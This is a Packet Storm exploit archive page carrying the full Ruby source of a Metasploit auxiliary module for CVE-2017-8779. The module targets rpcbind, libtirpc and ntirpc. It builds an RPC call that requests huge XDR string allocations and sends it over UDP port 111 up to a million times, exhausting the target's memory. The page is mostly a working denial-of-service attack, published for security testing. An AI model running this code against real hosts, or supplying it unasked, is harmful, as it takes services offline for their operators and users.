exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

RPC Denial of Service targeting *nix rpcbind/libtirpc

RPC Denial of Service targeting *nix rpcbind/libtirpc
Posted Aug 31, 2024
Authored by Guido Vranken, Pearce Barry | Site metasploit.com

This Metasploit module exploits a vulnerability in certain versions of rpcbind, LIBTIRPC, and NTIRPC, allowing an attacker to trigger large (and never freed) memory allocations for XDR strings on the target.

tags | exploit
advisories | CVE-2017-8779
SHA-256 | 9cb9f42f23398bceca7a6b058d3843930866bd713221a166b211f3635a4bab18

RPC Denial of Service targeting *nix rpcbind/libtirpc

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Dos
include Msf::Auxiliary::Report
include Msf::Auxiliary::UDPScanner

def initialize(info={})
super(update_info(info,
'Name' => 'RPC DoS targeting *nix rpcbind/libtirpc',
'Description' => %q{
This module exploits a vulnerability in certain versions of
rpcbind, LIBTIRPC, and NTIRPC, allowing an attacker to trigger
large (and never freed) memory allocations for XDR strings on
the target.
},
'Author' =>
[
'guidovranken', # original code
'Pearce Barry <pearce_barry[at]rapid7.com>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2017-8779' ],
[ 'BID', '98325' ],
[ 'URL', 'https://openwall.com/lists/oss-security/2017/05/03/12' ]
],
'Disclosure Date' => 'May 03 2017'))

register_options([
Opt::RPORT(111),
OptInt.new('ALLOCSIZE', [true, 'Number of bytes to allocate', 1000000]),
OptInt.new('COUNT', [false, "Number of intervals to loop", 1000000])
])
end

def scan_host(ip)
pkt = [
0, # xid
0, # message type CALL
2, # RPC version 2
100000, # Program
4, # Program version
9, # Procedure
0, # Credentials AUTH_NULL
0, # Credentials length 0
0, # Credentials AUTH_NULL
0, # Credentials length 0
0, # Program: 0
0, # Ver
4, # Proc
4, # Argument length
datastore['ALLOCSIZE'] # Payload
].pack('N*')

s = udp_socket(ip, datastore['RPORT'])
count = 0
while count < datastore['COUNT'] do
begin
s.send(pkt, 0)
rescue ::Errno::ENOBUFS, ::Rex::ConnectionError, ::Errno::ECONNREFUSED
vprint_error("Host #{ip} unreachable")
break
end
count += 1
end

vprint_good("Completed #{count} loop(s) of allocating #{datastore['ALLOCSIZE']} bytes on host #{ip}:#{datastore['RPORT']}")
end
end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close